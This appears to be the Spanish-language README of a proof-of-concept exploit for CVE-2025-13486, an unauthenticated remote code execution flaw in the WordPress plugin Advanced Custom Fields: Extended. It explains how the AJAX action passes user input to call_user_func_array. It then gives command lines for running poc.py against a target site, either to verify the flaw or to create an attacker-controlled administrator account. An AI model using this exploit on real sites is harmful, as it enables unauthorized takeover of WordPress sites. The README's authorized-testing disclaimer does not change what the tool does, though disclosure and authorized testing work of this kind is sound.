
PoC para CVE-2025-13486
Una prueba de concepto (PoC) para la vulnerabilidad CVE-2025-13486, una vulnerabilidad de Ejecución Remota de Código en el plugin de WordPress Advanced Custom Fields: Extended (ACFE).
Esta vulnerabilidad existe en las versiones 0.9.0.5 a 0.9.1.1 de ACFE, permitiendo a atacantes no autenticados ejecutar funciones PHP arbitrarias a través de la acción AJAX acfe/form/render_form_ajax. El plugin utiliza call_user_func_array() con entrada proporcionada por el usuario sin la validación adecuada.
print_r (no destructivo)pip install requests
python poc.py -u http://sitio-objetivo.com --verify
# Con credenciales aleatorias (mostradas después de la ejecución)
python poc.py -u http://sitio-objetivo.com
# Con credenciales personalizadas
python poc.py -u http://sitio-objetivo.com --user admin123 --password P@ssw0rd! --email [email protected]
-u, --url URL del sitio WordPress objetivo (obligatorio)
--verify Solo verificar vulnerabilidad (más seguro, usa print_r)
--user Nombre de usuario a crear (por defecto: aleatorio)
--password Contraseña a establecer (por defecto: aleatoria)
--email Dirección de correo a establecer (por defecto: aleatoria)
Esta PoC se proporciona solo con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas.